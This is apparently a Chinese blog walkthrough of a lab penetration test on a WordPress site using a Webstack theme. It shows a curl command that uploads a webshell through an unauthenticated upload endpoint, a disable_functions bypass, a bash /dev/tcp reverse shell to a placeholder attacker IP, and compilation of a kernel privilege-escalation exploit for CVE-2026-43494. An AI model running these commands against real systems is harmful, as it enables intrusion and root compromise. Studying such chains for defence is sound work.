网站渗透实操！从getshell到CVE提权，Linux最新内核也可提权！

前段时间Webstack写马漏洞公开

渗透思路如下：

从webstack写马→蚁剑连接→绕过disable_functions→nc反弹→exp提权

实操开始

靶场我用自建WordPress

要看一个webstack站点有没有漏洞可以访问

wp-admin/admin-ajax.php?action=img_upload路径

如果显示0如图，那十有八九就是有这个漏洞

开始写马

在当前目录下创建好木马php文件

然后运行命令上传木马

curl -F "files=@shell.php" https://目标站点/wp-admin/admin-ajax.php?action=img_upload

如图，返回上传成功和木马地址

直接访问木马地址

显示白页，说明木马正常可用

蚁剑连接

测试连接显示成功，然后直接添加

然后打开虚拟终端

发现任何命令都无法执行，原因是禁用了函数，这里需要用到蚁剑插件

绕过 disable_functions

使用蚁剑绕函数插件

靶场php版本为8.1选择对应模式，点击开始

发现命令可成功执行

接下来就直接开始反弹了

Bash反弹

蚁剑虚拟终端（靶机）运行bash -i >& /dev/tcp/攻击机IP/4444 0>&1

攻击机运行

nc -lvnp 4444

用来监听4444端口

此处需攻击机先监听端口，靶机再执行反弹命令

反弹连接成功，

执行cat /etc/os-release命令看看操作系统，发现是乌班图26系统，然后执行lsmod | grep rds命令，发现模块也开启了

刚好可以复现CVE-2026-43494

开始测试

通过蚁剑上传poc

然后运行gcc -O CVE-2026-43494.c -o exp编译poc

运行命令

file exp看看文件编译成功没

看得到exp文件是编译成功

开始提权

直接运行./exp

出现如图不报错，等待一会

直接whoami查看当前用户

显示root用户，输入id回车也是root用户

至此整场渗透结束

结束语

最后，请大家多注重网络安全，及时更新内核，补丁，防患于未然。